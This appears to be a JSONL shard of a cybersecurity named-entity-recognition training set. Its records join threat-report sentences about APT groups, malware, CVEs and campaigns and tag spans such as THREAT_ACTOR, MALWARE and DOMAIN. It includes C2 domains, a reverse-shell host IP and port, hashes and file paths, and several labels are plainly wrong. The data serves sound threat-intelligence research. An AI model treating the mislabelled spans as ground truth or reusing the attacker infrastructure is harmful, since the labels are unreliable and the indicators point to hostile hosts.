{"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan .", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: APT32": [[43, 48]], "ORGANIZATION: foreign corporations": [[59, 79]], "ORGANIZATION: manufacturing": [[117, 130]], "ORGANIZATION: consumer products": [[133, 150]], "ORGANIZATION: hospitality sectors": [[157, 176]], "THREAT_ACTOR: Icefog": [[179, 185]], "THREAT_ACTOR: Dagger Panda": [[208, 220]], "ORGANIZATION: Crowdstrike": [[226, 237]]}, "info": {"id": "cyberner_stix_train_001133", "source": "cyberner_stix_train"}}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers first infected in March 2017 .", "spans": {"TOOL: POWRUNER": [[0, 8]], "MALWARE: RTF file": [[41, 49]], "VULNERABILITY: CVE-2017-0199": [[65, 78]]}, "info": {"id": "cyberner_stix_train_001134", "source": "cyberner_stix_train"}}
{"text": "The majority of samples analyzed to date were submitted no earlier than mid-October , with most being submitted in January 2017 or later .", "spans": {}, "info": {"id": "cyberner_stix_train_001135", "source": "cyberner_stix_train"}}
{"text": "However , a simple Google search for the adware package name returned a “ TestDelete ” project that had been available in his repository at some point The malicious developer also has apps in Apple ’ s App Store . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . Filename: conhote.dll .", "spans": {"ORGANIZATION: Google": [[19, 25]], "ORGANIZATION: Apple": [[192, 197]], "SYSTEM: App Store": [[202, 211]], "MALWARE: malware": [[218, 225]], "MALWARE: file": [[265, 269]], "MALWARE: C:\\WINDOWS\\tasksche.exe": [[270, 293]], "FILEPATH: conhote.dll": [[306, 317]]}, "info": {"id": "cyberner_stix_train_001136", "source": "cyberner_stix_train"}}
{"text": "After the initial compromise , TG-3390 delivers the HttpBrowser backdoor to its victims .", "spans": {"THREAT_ACTOR: TG-3390": [[31, 38]], "MALWARE: HttpBrowser backdoor": [[52, 72]]}, "info": {"id": "cyberner_stix_train_001137", "source": "cyberner_stix_train"}}
{"text": "The phishing pages shown in the overlay use Ajax calls to communicate with a PHP back-end which stores all user input . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research . BlackOasis in recent months sent a wave of phishing emails . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": {"ORGANIZATION: Kaspersky Lab": [[174, 187]], "THREAT_ACTOR: BlackOasis": [[217, 227]], "TOOL: emails": [[269, 275]], "THREAT_ACTOR: APT33": [[278, 283]]}, "info": {"id": "cyberner_stix_train_001138", "source": "cyberner_stix_train"}}
{"text": "EventBot mobile banking applications targetedApplications targeted by EventBot . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": {"MALWARE: EventBot": [[0, 8], [70, 78]], "MALWARE: .lnk file": [[134, 143]], "THREAT_ACTOR: Lotus Blossom": [[275, 288]], "VULNERABILITY: exploit": [[302, 309]], "VULNERABILITY: CVE-2014-6332": [[310, 323]]}, "info": {"id": "cyberner_stix_train_001139", "source": "cyberner_stix_train"}}
{"text": "MALWARE UNDER ACTIVE DEVELOPMENT EventBot “ cfg ” class EventBot “ cfg ” class . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) .", "spans": {"MALWARE: EventBot": [[33, 41], [56, 64]], "MALWARE: Batmobi": [[187, 194]], "MALWARE: Duapps": [[197, 203]], "MALWARE: Cheetah SDK": [[222, 233]], "ORGANIZATION: CTU": [[236, 239]], "THREAT_ACTOR: actors": [[301, 307]], "THREAT_ACTOR: COBALT GYPSY": [[356, 368]], "THREAT_ACTOR: Threat Group-2889": [[401, 418]]}, "info": {"id": "cyberner_stix_train_001141", "source": "cyberner_stix_train"}}
{"text": "The threat actors behind this attack demonstrated some interesting techniques , including :", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]]}, "info": {"id": "cyberner_stix_train_001142", "source": "cyberner_stix_train"}}
{"text": "The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors .", "spans": {"MALWARE: Shamoon2": [[74, 82]]}, "info": {"id": "cyberner_stix_train_001143", "source": "cyberner_stix_train"}}
{"text": "The c2 domain ( khanji.ddns.net ) was also found to be associated with multiple malware samples in the past , Some of these malware samples made connection to pastebin urls upon execution , which is similar to the behavior mentioned previously .", "spans": {"TOOL: c2": [[4, 6]], "DOMAIN: khanji.ddns.net": [[16, 31]], "TOOL: pastebin": [[159, 167]]}, "info": {"id": "cyberner_stix_train_001144", "source": "cyberner_stix_train"}}
{"text": "Many of the functionalities seen in this spyware are similar to Spynote and Spymax based on the samples we analyzed with some modifications . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . NEODYMIUM is reportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"MALWARE: Spynote": [[64, 71]], "MALWARE: Spymax": [[76, 82]], "ORGANIZATION: Symantec": [[196, 204]], "THREAT_ACTOR: Buckeye": [[244, 251]], "THREAT_ACTOR: NEODYMIUM": [[267, 276]], "THREAT_ACTOR: BlackOasis": [[315, 325]]}, "info": {"id": "cyberner_stix_train_001145", "source": "cyberner_stix_train"}}
{"text": "We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": {"THREAT_ACTOR: Suckfly": [[16, 23], [180, 187]]}, "info": {"id": "cyberner_stix_train_001146", "source": "cyberner_stix_train"}}
{"text": "These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software .", "spans": {"THREAT_ACTOR: threat groups": [[37, 50]], "VULNERABILITY: CVE-2018-0798": [[103, 116]], "MALWARE: legitimate software": [[402, 421]]}, "info": {"id": "cyberner_stix_train_001147", "source": "cyberner_stix_train"}}
{"text": "They use At.exe to schedule tasks to run self-extracting RAR archives , which install either HttpBrowser or PlugX .", "spans": {"FILEPATH: At.exe": [[9, 15]], "TOOL: RAR": [[57, 60]], "MALWARE: HttpBrowser": [[93, 104]], "MALWARE: PlugX": [[108, 113]]}, "info": {"id": "cyberner_stix_train_001148", "source": "cyberner_stix_train"}}
{"text": "These cyber operations have included spear phishing campaigns targeting government organizations , critical infrastructure entities , think tanks , universities , political organizations , and corporations , leading to the theft of information .", "spans": {}, "info": {"id": "cyberner_stix_train_001149", "source": "cyberner_stix_train"}}
{"text": "Structure of data sent to the server : To begin with , the Trojan sends information about the device to the server : In response , the server sends the code of the command for execution ( “ command ” ) , its parameters ( “ params ” ) , and the time delay before execution ( “ waitrun ” in milliseconds ) . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . It remains unclear whether these are leftover code from the previous versions or their particular purposes were served . As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": {"VULNERABILITY: CVE-2011-3544": [[355, 368]], "TOOL: HTTPBrowser backdoor": [[436, 456]], "VULNERABILITY: CVE-2010-0738": [[463, 476]], "TOOL: JBoss": [[498, 503]], "ORGANIZATION: Cisco Talos": [[774, 785]], "ORGANIZATION: cybersecurity professionals": [[905, 932]]}, "info": {"id": "cyberner_stix_train_001150", "source": "cyberner_stix_train"}}
{"text": "FireEye products have robust detection for the malware used in this campaign . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[89, 94]], "FILEPATH: Vietnam.exe": [[193, 204]], "ORGANIZATION: diaspora": [[264, 272]]}, "info": {"id": "cyberner_stix_train_001151", "source": "cyberner_stix_train"}}
{"text": "It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have .", "spans": {}, "info": {"id": "cyberner_stix_train_001152", "source": "cyberner_stix_train"}}
{"text": "The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . These images were associated with the Bookworm campaign code \" 20150905 \" .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "cyberner_stix_train_001153", "source": "cyberner_stix_train"}}
{"text": "Malicious codes are embedded in apps that the operators repackaged from legitimate applications . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . FIN7.5 : the infamous cybercrime rig FIN7 continues its activities . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": {"THREAT_ACTOR: FIN7.5": [[306, 312]], "THREAT_ACTOR: FIN7": [[343, 347]], "ORGANIZATION: antivirus provider": [[572, 590]], "ORGANIZATION: Kaspersky Lab": [[591, 604]]}, "info": {"id": "cyberner_stix_train_001154", "source": "cyberner_stix_train"}}
{"text": "The following list of documents included :", "spans": {}, "info": {"id": "cyberner_stix_train_001155", "source": "cyberner_stix_train"}}
{"text": "Check Point Research has submitted data to Google and law enforcement units to facilitate further investigation . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand . Their targets , however , appear to be individuals that do not share common affiliations. ” Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[43, 49]], "ORGANIZATION: Unit 42": [[114, 121]], "TOOL: Bookworm samples": [[181, 197]], "ORGANIZATION: government": [[266, 276]], "MALWARE: TrickBot": [[401, 409]]}, "info": {"id": "cyberner_stix_train_001156", "source": "cyberner_stix_train"}}
{"text": "Based on this JSON reply , the app looks for an HTML snippet that corresponds to the active element ( show_hide btnnext ) and , if found , the Javascript snippet tries to perform a click ( ) method on it . Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications . As corporate networks become more secure and users become more vigilant , personal accounts can still offer a means to bypass security systems . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": {"ORGANIZATION: space exploration": [[310, 327]], "ORGANIZATION: nanotechnology": [[330, 344]], "ORGANIZATION: energy production": [[347, 364]], "ORGANIZATION: nuclear power": [[367, 380]], "ORGANIZATION: lasers": [[383, 389]], "ORGANIZATION: medicine": [[392, 400]], "ORGANIZATION: communications": [[405, 419]], "ORGANIZATION: Apple": [[567, 572]], "SYSTEM: iPhones": [[628, 635]], "SYSTEM: iPads": [[640, 645]], "VULNERABILITY: CVE-2023 - 37450": [[664, 680]], "SYSTEM: the WebKit browser": [[724, 742]], "TOOL: Safari": [[755, 761]], "SYSTEM: web browsers": [[772, 784]]}, "info": {"id": "cyberner_stix_train_001157", "source": "cyberner_stix_train"}}
{"text": "Read our report , APT37 (Reaper): The Overlooked North Korean Actor , to learn more about our assessment that this threat actor is working on behalf of the North Korean government , as well as various other details about their operations . Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before .", "spans": {"THREAT_ACTOR: APT37": [[18, 23]], "ORGANIZATION: North Korean government": [[156, 179]], "FILEPATH: Ploutus": [[295, 302]]}, "info": {"id": "cyberner_stix_train_001158", "source": "cyberner_stix_train"}}
{"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . The threat actors have continually used Flash Player installers and Flash slideshows for decoys .", "spans": {"TOOL: Equation Editor": [[36, 51]], "MALWARE: EQNEDT32.EXE": [[54, 66]], "MALWARE: Flash Player installers": [[203, 226]], "MALWARE: Flash slideshows": [[231, 247]]}, "info": {"id": "cyberner_stix_train_001159", "source": "cyberner_stix_train"}}
{"text": "testproj.exe dropped benign decoy files and started malicious executables .", "spans": {"FILEPATH: testproj.exe": [[0, 12]]}, "info": {"id": "cyberner_stix_train_001160", "source": "cyberner_stix_train"}}
{"text": "The approach of separating malicious functionality out into separate stages that are later downloaded during execution and not present in the initial app published to the Google Play Store , combined with social engineering delivered via social media platforms like Facebook , requires minimal investment in comparison to premium tooling like Pegasus or FinFisher . To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry . In a recent wave of attacks during February 2019 , Elfin attempted to exploit a known vulnerability ( CVE-2018-20250 ) in WinRAR , the widely used file archiving and compression utility capable of creating self-extracting archive files . As we ’ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": {"SYSTEM: Google Play Store": [[171, 188]], "ORGANIZATION: Facebook": [[266, 274]], "MALWARE: Pegasus": [[343, 350]], "MALWARE: FinFisher": [[354, 363]], "THREAT_ACTOR: Lazarus group": [[380, 393]], "ORGANIZATION: financial industry": [[478, 496]], "THREAT_ACTOR: Elfin": [[550, 555]], "VULNERABILITY: CVE-2018-20250": [[601, 615]], "TOOL: WinRAR": [[621, 627]]}, "info": {"id": "cyberner_stix_train_001161", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive—or even destructive—event .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[55, 62]], "ORGANIZATION: Dragos": [[165, 171]], "THREAT_ACTOR: XENOTIME": [[211, 219]]}, "info": {"id": "cyberner_stix_train_001162", "source": "cyberner_stix_train"}}
{"text": "It can turn off “ VerifyApps ” and enable the installation of apps from 3rd party stores by changing system settings . That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date . Since 2004 , Mandiant has investigated computer security breaches at hundreds of organizations around the world.The majority of these security breaches are attributed to advanced threat actors referred to as the “ Advanced Persistent Threat ” ( APT ) . These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": {"ORGANIZATION: security firm": [[157, 170]], "ORGANIZATION: CrowdStrike": [[171, 182]], "ORGANIZATION: Mandiant": [[318, 326]]}, "info": {"id": "cyberner_stix_train_001163", "source": "cyberner_stix_train"}}
{"text": "They decrypt several archive files from the assets folder of the installation package , and launch an executable file from them with the name “ start. ” The interesting thing is that the Trojan supports even the 64-bit version of Android , which is very rare . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia . According to the relevant underground forums and messaging groups , these criminals also infect front desk machines in order to capture credentials from the hotel administration software ; they can then steal credit card details from it too . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"SYSTEM: Android": [[230, 237]]}, "info": {"id": "cyberner_stix_train_001164", "source": "cyberner_stix_train"}}
{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "FILEPATH: exploit code": [[174, 186]]}, "info": {"id": "cyberner_stix_train_001165", "source": "cyberner_stix_train"}}
{"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": {"MALWARE: document files": [[4, 18]], "VULNERABILITY: vulnerabilities": [[48, 63]], "MALWARE: Tran Duy Linh": [[168, 181]], "VULNERABILITY: CVE-2012-0158": [[184, 197]], "VULNERABILITY: exploit": [[198, 205]]}, "info": {"id": "cyberner_stix_train_001166", "source": "cyberner_stix_train"}}
{"text": "During the investigation , Talos was also able to determine that the same infrastructure has been used to deploy similar campaigns using different versions of the malware . Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims . OceanLotus : worker.baraeme.com:8531 11b4 . The UK ’s National Cyber Security Centre ( NCSC ) assesses that the Russian Military Intelligence was almost certainly involved in the 13 January defacements of Ukrainian government websites and the deployment of Whispergate destructive malware .", "spans": {"ORGANIZATION: Talos": [[27, 32]], "ORGANIZATION: MSPs": [[214, 218]], "THREAT_ACTOR: APT10": [[231, 236]], "TOOL: MSP": [[260, 263]], "THREAT_ACTOR: OceanLotus": [[409, 419]], "DOMAIN: worker.baraeme.com:8531": [[422, 445]], "ORGANIZATION: UK ’s National Cyber Security Centre ( NCSC )": [[457, 502]], "THREAT_ACTOR: the Russian Military Intelligence": [[517, 550]], "ORGANIZATION: Ukrainian government websites": [[614, 643]], "MALWARE: Whispergate destructive malware": [[666, 697]]}, "info": {"id": "cyberner_stix_train_001167", "source": "cyberner_stix_train"}}
{"text": "However , Ryuk is only used by GRIM SPIDER and , unlike Hermes , Ryuk has only been used to target enterprise environments . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes .", "spans": {"TOOL: Ryuk": [[10, 14], [65, 69]], "TOOL: Hermes": [[56, 62]]}, "info": {"id": "cyberner_stix_train_001168", "source": "cyberner_stix_train"}}
{"text": "We expect this list to grow given that this actor has changed its infrastructure numerous times in 2017 . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We have observed 767 separate instances in which APT1 intruders used the publicly available “ HUC Packet Transmit Tool ” or HTRAN on a hop . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": {"VULNERABILITY: CVE-2012-0158": [[187, 200]], "THREAT_ACTOR: APT1": [[282, 286]], "TOOL: HUC Packet Transmit Tool": [[327, 351]], "TOOL: HTRAN": [[357, 362]], "TOOL: Greatness": [[374, 383]], "SYSTEM: IP filtering": [[512, 524]], "SYSTEM: Telegram bots": [[546, 559]]}, "info": {"id": "cyberner_stix_train_001169", "source": "cyberner_stix_train"}}
{"text": "The instances we observed , however , used the DDE exploit to deliver different payloads than what was observed previously .", "spans": {}, "info": {"id": "cyberner_stix_train_001170", "source": "cyberner_stix_train"}}
{"text": "There have been numerous reports of hTran being used by different Chinese threat actors , including : APT3 , APT27 and DragonOK . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"TOOL: hTran": [[36, 41]], "THREAT_ACTOR: threat actors": [[74, 87]], "THREAT_ACTOR: APT3": [[102, 106]], "THREAT_ACTOR: APT27": [[109, 114]], "THREAT_ACTOR: DragonOK": [[119, 127]], "ORGANIZATION: citizens": [[201, 209]]}, "info": {"id": "cyberner_stix_train_001171", "source": "cyberner_stix_train"}}
{"text": "In this figure we have 11 RuMMS samples , all of which were hosted on the website as shown in the “ y ” axis . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . The second document from the beginning of January is named \" fb.docx \" and contains usernames and passwords from an alleged \" Facebook \" leak . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": {"MALWARE: RuMMS": [[26, 31]], "THREAT_ACTOR: threat group": [[116, 128]], "ORGANIZATION: financial": [[202, 211]], "ORGANIZATION: government": [[214, 224]], "ORGANIZATION: energy": [[227, 233]], "ORGANIZATION: chemical": [[236, 244]], "ORGANIZATION: telecommunications": [[251, 269]], "FILEPATH: fb.docx": [[333, 340]], "TOOL: Facebook": [[398, 406]]}, "info": {"id": "cyberner_stix_train_001172", "source": "cyberner_stix_train"}}
{"text": "The following scenario may play out : according to the templates for processing incoming SMSs , Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"MALWARE: Rotexy": [[96, 102]], "TOOL: Bookworm": [[265, 273]], "MALWARE: decoys documents": [[360, 376]], "TOOL: dynamic DNS domain": [[405, 423]], "FILEPATH: documents": [[516, 525]], "VULNERABILITY: CVE-2017-0199": [[536, 549]]}, "info": {"id": "cyberner_stix_train_001173", "source": "cyberner_stix_train"}}
{"text": "The result is a large online population who have been the subject of numerous cyber-attacks in the past . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"MALWARE: TajMahal": [[125, 133]], "ORGANIZATION: Kaspersky": [[168, 177]], "ORGANIZATION: government": [[348, 358]], "ORGANIZATION: think tank": [[401, 411]]}, "info": {"id": "cyberner_stix_train_001174", "source": "cyberner_stix_train"}}
{"text": "Exodus : New Android Spyware Made in Italy Mar 29 Summary We identified a new Android spyware platform we named Exodus , which is composed of two stages we call Exodus One and Exodus Two . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 . It uses minimal obfuscation applied only on variables and function naming . In terms of the fallout , it ’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": {"MALWARE: Exodus": [[0, 6], [112, 118]], "SYSTEM: Android": [[13, 20], [78, 85]], "MALWARE: Exodus One": [[161, 171]], "MALWARE: Exodus Two": [[176, 186]], "ORGANIZATION: financial": [[226, 235]], "ORGANIZATION: energy": [[238, 244]], "ORGANIZATION: government organizations": [[249, 273]], "ORGANIZATION: FireEye": [[280, 287]], "THREAT_ACTOR: APT34": [[342, 347]], "THREAT_ACTOR: Cl0p": [[487, 491]]}, "info": {"id": "cyberner_stix_train_001175", "source": "cyberner_stix_train"}}
{"text": "There are connections between a subset of the group's operational infrastructure and PRC-based Internet service providers .", "spans": {"ORGANIZATION: PRC-based": [[85, 94]]}, "info": {"id": "cyberner_stix_train_001176", "source": "cyberner_stix_train"}}
{"text": "This trojan 's design and implementation is of an uncommonly high level , making it a dangerous threat . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems .", "spans": {"THREAT_ACTOR: group": [[109, 114]], "ORGANIZATION: military": [[197, 205]], "ORGANIZATION: organizations": [[206, 219]], "THREAT_ACTOR: APT38": [[222, 227]]}, "info": {"id": "cyberner_stix_train_001177", "source": "cyberner_stix_train"}}
{"text": "Based on the public blog post – which also indicated that FireEye is responding to an intrusion at a second facility featuring the same or similar observations – this is presumably not for lack of evidence , yet the “ downgrade ” occurs all the same .", "spans": {"ORGANIZATION: FireEye": [[58, 65]]}, "info": {"id": "cyberner_stix_train_001178", "source": "cyberner_stix_train"}}
{"text": "The abuse of the WebSocket protocol provides XLoader with a persistent connection between clients and servers where data can be transported any time . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . This may indicate the campaign is still ongoing .", "spans": {"MALWARE: XLoader": [[45, 52]], "THREAT_ACTOR: Lazarus": [[188, 195]], "ORGANIZATION: banks'": [[220, 226]]}, "info": {"id": "cyberner_stix_train_001179", "source": "cyberner_stix_train"}}
{"text": "The final step in the trojan 's initialization is the escalation and maintenance of privileges in the device . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ITG08": [[111, 116]], "ORGANIZATION: retailers": [[248, 257]], "ORGANIZATION: hospitality sector": [[279, 297]], "THREAT_ACTOR: ScarCruft": [[323, 332]]}, "info": {"id": "cyberner_stix_train_001180", "source": "cyberner_stix_train"}}
{"text": "This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other , unclear purposes . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . The ScarCruft has shown itself to be a highly-skilled and active group .", "spans": {"MALWARE: ViceLeaker": [[88, 98]], "THREAT_ACTOR: DarkHydrus": [[188, 198]], "THREAT_ACTOR: ScarCruft": [[253, 262]]}, "info": {"id": "cyberner_stix_train_001181", "source": "cyberner_stix_train"}}
{"text": "ORat is the name assigned by the malware author , as denoted by the program debug database string in the analyzed sample : D:\\vswork\\Plugin\\ORat\\build\\Release\\ORatServer\\Loader.pdb .", "spans": {"MALWARE: ORat": [[0, 4]]}, "info": {"id": "cyberner_stix_train_001182", "source": "cyberner_stix_train"}}
{"text": "In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company . The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment .", "spans": {"THREAT_ACTOR: APT37": [[14, 19]], "ORGANIZATION: board member": [[86, 98]], "ORGANIZATION: financial company": [[119, 136]], "TOOL: emails": [[158, 164]], "THREAT_ACTOR: Callisto Group": [[198, 212]]}, "info": {"id": "cyberner_stix_train_001183", "source": "cyberner_stix_train"}}
{"text": "Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses .", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "TOOL: Infy": [[190, 194], [242, 246]], "TOOL: Infy M.": [[199, 206]], "TOOL: malware": [[257, 264]], "TOOL: keylogger": [[298, 307]], "ORGANIZATION: accounting departments": [[443, 465]], "ORGANIZATION: businesses": [[477, 487]]}, "info": {"id": "cyberner_stix_train_001184", "source": "cyberner_stix_train"}}
{"text": "It uses different topics that include the unique device identifier , which side is sending the message , and whether it is information message or command . From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings . They most likely used the Qt Creator IDE in a Windows . The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “ PIG GOD”—another", "spans": {"THREAT_ACTOR: APT33": [[191, 196]], "ORGANIZATION: organization": [[216, 228]], "ORGANIZATION: aerospace sector": [[236, 252]], "ORGANIZATION: business conglomerate": [[268, 289]], "TOOL: Qt Creator IDE": [[365, 379]], "SYSTEM: Windows": [[385, 392]]}, "info": {"id": "cyberner_stix_train_001185", "source": "cyberner_stix_train"}}
{"text": "Reverse shell payload The payload is started by the main module with a specified host and port as a parameter that is hardcoded to ‘ 54.67.109.199 ’ and ‘ 30010 ’ in some versions : Alternatively , they could be hardcoded directly into the payload code : We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path . The group was first revealed and named by SkyEye Team in May 2015 . The group has targeted healthcare , defense , aerospace , and government sectors , and has targeted Japanese victims since at least 2014 .", "spans": {"THREAT_ACTOR: group": [[378, 383]]}, "info": {"id": "cyberner_stix_train_001186", "source": "cyberner_stix_train"}}
{"text": "The extracted executable file contains a compiled Autoit script , which can be seen in the RT_RCDATA section of the file .", "spans": {"TOOL: Autoit": [[50, 56]]}, "info": {"id": "cyberner_stix_train_001187", "source": "cyberner_stix_train"}}
{"text": "This could indicate that actor already has plans in expanding the targets to applications from different countries and regions . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . An overview of the connections among these threats is discussed in below .", "spans": {"ORGANIZATION: Rapid7": [[150, 156]], "MALWARE: gup.exe": [[199, 206]], "MALWARE: ANEL": [[344, 348]]}, "info": {"id": "cyberner_stix_train_001188", "source": "cyberner_stix_train"}}
{"text": "The final payload ( dd03c6eb62c9bf9adaf831f1d7adcbab ) is implanted manually as in the WFCWallet case .", "spans": {"FILEPATH: dd03c6eb62c9bf9adaf831f1d7adcbab": [[20, 52]], "TOOL: WFCWallet": [[87, 96]]}, "info": {"id": "cyberner_stix_train_001189", "source": "cyberner_stix_train"}}
{"text": "I hope that by uncovering this malware at such an early stage , we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods . In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor . These operators , like soldiers , may merely be following orders given to them by others . Its code identifies the victim ’s browser and then serves one of two exploits .", "spans": {"TOOL: Octopus": [[198, 205]]}, "info": {"id": "cyberner_stix_train_001190", "source": "cyberner_stix_train"}}
